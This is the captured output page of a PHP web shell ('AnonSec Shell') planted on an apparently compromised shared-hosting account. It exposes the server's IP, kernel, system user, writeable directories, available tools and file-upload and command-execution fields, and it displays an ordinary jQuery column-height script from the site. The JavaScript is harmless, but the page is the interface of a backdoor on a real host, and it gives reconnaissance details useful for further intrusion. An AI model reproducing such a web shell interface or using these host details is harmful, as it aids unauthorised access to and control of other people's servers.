AnonSec Shell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.193
Web Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : awebpaca ( 35430)
PHP Version : 8.5.0
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/a/w/e/awebpaca/orves/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/a/w/e/awebpaca/orves/assets/js/layout.ie.js
jQuery(function ($) {
    'use strict';

    var rows = $('.bd-flex-horizontal.bd-flex-wide');

    fixContentLayoutHeight(rows);

    var t = null;
    $(window).on('resize', function () {
        clearTimeout(t);
        t = setTimeout(fixContentLayoutHeight.bind(null, rows), 100);
    });

    function fixContentLayoutHeight(rows) {
        var loadPromises = [];

        function off() {
            /* jshint validthis: true */
            this.onload = null;
            this.onerror = null;
            this.onabort = null;
        }

        function on(dfd) {
            /* jshint validthis: true */
            off.bind(this)();
            dfd.resolve();
        }

        rows.each(function () {
            $(this).find('img').each(function () {
                if (this.complete) return;
                var deferred = $.Deferred();
                this.onload = on.bind(this, deferred);
                this.onerror = on.bind(this, deferred);
                this.onabort = on.bind(this, deferred);
                loadPromises.push(deferred.promise());
            });

            $.when.apply($, loadPromises).done(function () {
                var columns = $(this).children('[class*="-column "], [class$="-column"]');
                var contentColumn = $(this).children('.bd-flex-vertical.bd-flex-wide');
                var contentArea = contentColumn.children('.bd-flex-wide');

                contentArea.css('min-height', '');
                columns.children().css('min-height', '').each(function () {
                    var sidebar = $(this);
                    ['padding-top', 'padding-right', 'padding-bottom', 'padding-left'].forEach(function (padding) {
                        if (!parseInt(sidebar.css('padding'), 10)) {
                            sidebar.css(padding, '0.01px');
                        }
                    });
                });

                var columnHeight = columns.height();
                columns.children().css('min-height', columnHeight + 'px');

                var siblingsHeight = 0;
                contentArea.siblings().each(function () {
                    siblingsHeight += $(this).outerHeight(true);
                });

                if (contentColumn.height() > siblingsHeight + contentArea.outerHeight(true)) {
                    contentArea.css('min-height', (contentColumn.height() - siblingsHeight) + 'px');
                }
            }.bind(this));
        });
    }
});

Anon7 - 2022
AnonSec Team